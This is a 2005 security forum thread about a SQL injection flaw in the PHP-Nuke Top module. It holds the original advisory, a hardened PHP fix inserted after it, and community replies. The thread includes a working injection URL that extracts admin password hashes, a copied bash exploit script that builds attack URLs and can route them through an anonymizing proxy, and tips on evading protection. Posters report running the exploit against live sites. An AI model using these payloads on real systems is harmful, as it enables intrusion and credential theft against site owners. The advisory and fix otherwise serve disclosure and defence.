SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module
PostPosted: Wed Apr 06, 2005 6:43 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

{================================================================================}
{ [waraxe-2005-SA#041] }
{================================================================================}
{ }
{ [ Critical Sql Injection in PhpNuke 6.x-7.6 Top module ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 06. April 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-41.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular open-source content management system, written in PHP by
Francisco Burzi. This CMS is used on many thousands of websites, because it's
freeware, easy to install and manage, and has a broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Like the title says, this time the SQL injection security hole has been found in the
phpnuke "Top" module. Let's look at the source code of the phpnuke 7.6 Top module
index file (/modules/Top/index.php) ~ line 186:

[original source code]

/* Top 10 Polls */

$result8 = $db->sql_query("select * from ".$prefix."_poll_desc $queryplang");

if ($db->sql_numrows($result8)>0) {
echo "<table border=\"0\" cellpadding=\"10\" width=\"100%\"><tr><td align=\"left\">\n"
."<font class=\"option\"><b>$top "._VOTEDPOLLS."</b></font><br><br><font class=\"content\">\n";
$lugar = 1;

$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc
$querylang order by voters DESC limit 0,$top", $dbi);

$counter = 0;

[/original source code]

And what's the problem? It appears that the variable "$querylang" is uninitialized. So, if we
"poison" the PHP variable space through GET/POST/COOKIE, then SQL query manipulation is
possible.

[real life exploit]

http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION
%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*

[/real life exploit]


... and as a result we can see the md5 hashes of all the admin passwords in the place where normally
the top 10 votes can be seen :)
Of course, MySQL version 4.x must be used, with UNION functionality enabled. And if there are
Sentinel or similar protection systems installed, additional measures must be used to evade them.

Have a nice day!


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For help look @ http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free Base64 decoder and encoder - http://base64-encoder-online.waraxe.us/

SiteMapper - free php script for phpNuke powered websites -
newest version 0.4 can be downloaded @ http://sitemapper.waraxe.us/


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, murdock, g0df4th3r, slimjim100, shai-tan, y3dips and
all other active members from my forum!

Special greets to Heintz - congrats on the phpbb sploit finding!

Greetings - Raido Kerna!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Last edited by waraxe on Thu Jun 22, 2006 1:11 pm; edited 1 time in total
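A hardened version of the "Top 10 Polls" query from the advisory above, written here as an added example (not PHP-Nuke's own code): the root cause is an uninitialized $querylang that register_globals lets the request supply, so the fix initializes it, derives it only from an allowlisted language, and binds every remaining value. Assumptions: $db is a mysqli connection (PHP 5.6+ with mysqlnd), $prefix, $multilingual, $currentlang and $top come from the site configuration as in the original, and the poll table's language column is named planguage (an assumed name, not taken from the page).

```php
<?php
// Added example, not PHP-Nuke's code: hardened replacement for the
// "Top 10 Polls" block of modules/Top/index.php (around line 186).

// 1. Always initialize the variable. With register_globals on, an
//    uninitialized $querylang takes whatever GET/POST/COOKIE supplies.
$querylang = '';
$params    = [];
$types     = '';

// 2. Derive the WHERE fragment only from an allowlisted language value,
//    never from the request, and bind the language instead of
//    concatenating it. (Column name "planguage" is an assumption.)
$allowed_langs = ['english', 'german', 'spanish'];   // constructed list
if (!empty($multilingual) && in_array($currentlang, $allowed_langs, true)) {
    $querylang = "WHERE (planguage = ? OR planguage = '')";
    $params[]  = $currentlang;
    $types    .= 's';
}

// 3. LIMIT takes an integer: cast and clamp $top so it cannot carry SQL.
$limit = max(1, min(100, (int) $top));

// 4. The only string-assembled parts are now constants or allowlisted
//    fragments; every user-influenced value goes through bind_param.
$sql  = "SELECT pollID, pollTitle, timeStamp, voters FROM {$prefix}_poll_desc "
      . "$querylang ORDER BY voters DESC LIMIT ?";
$stmt = $db->prepare($sql);
if ($stmt === false) {
    error_log('Top module: prepare failed: ' . $db->error);
    return;
}
$params[] = $limit;
$types   .= 'i';
$stmt->bind_param($types, ...$params);
$stmt->execute();
$result9 = $stmt->get_result();

// 5. Render like the original loop, but escape on output as well.
while ($row = $result9->fetch_object()) {
    echo htmlspecialchars($row->pollTitle, ENT_QUOTES, 'UTF-8')
       . ' (' . (int) $row->voters . ")<br>\n";
}
```

The same pattern applies to the first query in the excerpt, which still interpolates $queryplang: any variable that reaches a query string must be assigned in the script before use.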
PostPosted: Wed Apr 06, 2005 7:10 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Wooow Waraxe!!!!!! Nice one! :D

I try it now immediately!

Salut!
PostPosted: Wed Apr 06, 2005 9:57 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

By the way, I found this SQL injection bug a long time ago, somewhere around November 2004, and had not published it yet. More than 3 months have passed but nobody has found that little security bug :lol:
Even worse, this bug exists even in very old nuke versions, maybe 5.x too, have not tested... ;)
PostPosted: Wed Apr 06, 2005 10:12 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Jejeje, as we say in Spain: "Lo bueno se hace esperar" ;)
(In English it means: "Good things make you wait", or something like this :P)
PostPosted: Thu Apr 07, 2005 7:31 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

there you go waraxe, a step ahead to get back on track

maybe you could add it to your SQLaxe library :lol:

_________________
IO::y3dips->new(http://clog.ammar.web.id);
PostPosted: Thu Apr 07, 2005 10:22 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

good work waraxe :)
PostPosted: Thu Apr 07, 2005 10:33 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Thanks, mate :D

By the way - a new advisory will come out sometime next week and it will not be about phpnuke, but about some other widely-used software ;)

So, stay tuned and check bugtraq and my forum 8)
PostPosted: Fri Apr 08, 2005 9:43 am
SteX
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

keep working..

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
PostPosted: Fri Apr 08, 2005 12:12 pm
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial-up is good for some things. Especially when my IP changes every time I log on. Lets me not get affected by Sentinel. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skinhead. :lol:

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
PostPosted: Fri Apr 08, 2005 12:28 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Wow! My name is also mentioned! :_ )
Thanks waraxe!
PostPosted: Fri Apr 08, 2005 12:34 pm
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Damn you :lol:

You got your name mentioned first 8)

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
PostPosted: Fri Apr 08, 2005 2:15 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

shai-tan wrote:
Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial-up is good for some things. Especially when my IP changes every time I log on. Lets me not get affected by Sentinel. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skinhead. :lol:

There are many restricting factors for that exploit to be successful:

1. UNION functionality means that the mysql engine must be > 4.x
2. the Top module must be activated
3. if there are not enough voted polls, the sploit will not work

etc ...

But real-life tests will show that there are lots of phpnuke driven websites waiting for a patch :)
PostPosted: Fri Apr 08, 2005 2:46 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Here are the typical errors I get using this exploit:

Sometimes it returns:

Code:
10 primeras encuestas más votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores más activos

Sometimes simply nothing appears:

Code:
10 primeras encuestas más votadas


10 autores más activos

And sometimes it simply...works! ;) http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg
PostPosted: Fri Apr 08, 2005 2:51 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yes, that's it:

Case 1 - mysql 3.x without UNION functionality:

Code:
10 primeras encuestas más votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores más activos

Case 2 - not enough votes or votes disabled:

Code:
10 primeras encuestas más votadas


10 autores más activos

And if you are lucky enough:

Quote:
http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg

:D
PostPosted: Fri Apr 08, 2005 8:08 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Look here for sploit derivation:

http://www.milw0rm.com/id.php?id=921

Code:

#/bin/bash

# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke

#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version! 
#

URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";

        echo -e "\n PHPNuke Top Module Remote SQL Injection"
        echo -e " by Fabrizi Andrea 2005"

if [ "$URL" = "" ]; then
   echo -e "\n USAGE: $0 [URL] [NukePath]"
   echo -e " Example: $0 www.site.net phpNuke\n"
   exit
fi;

if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"
# milw0rm.com [2005-04-07]


Nice one :D

All times are GMT  
Page 1 of 2  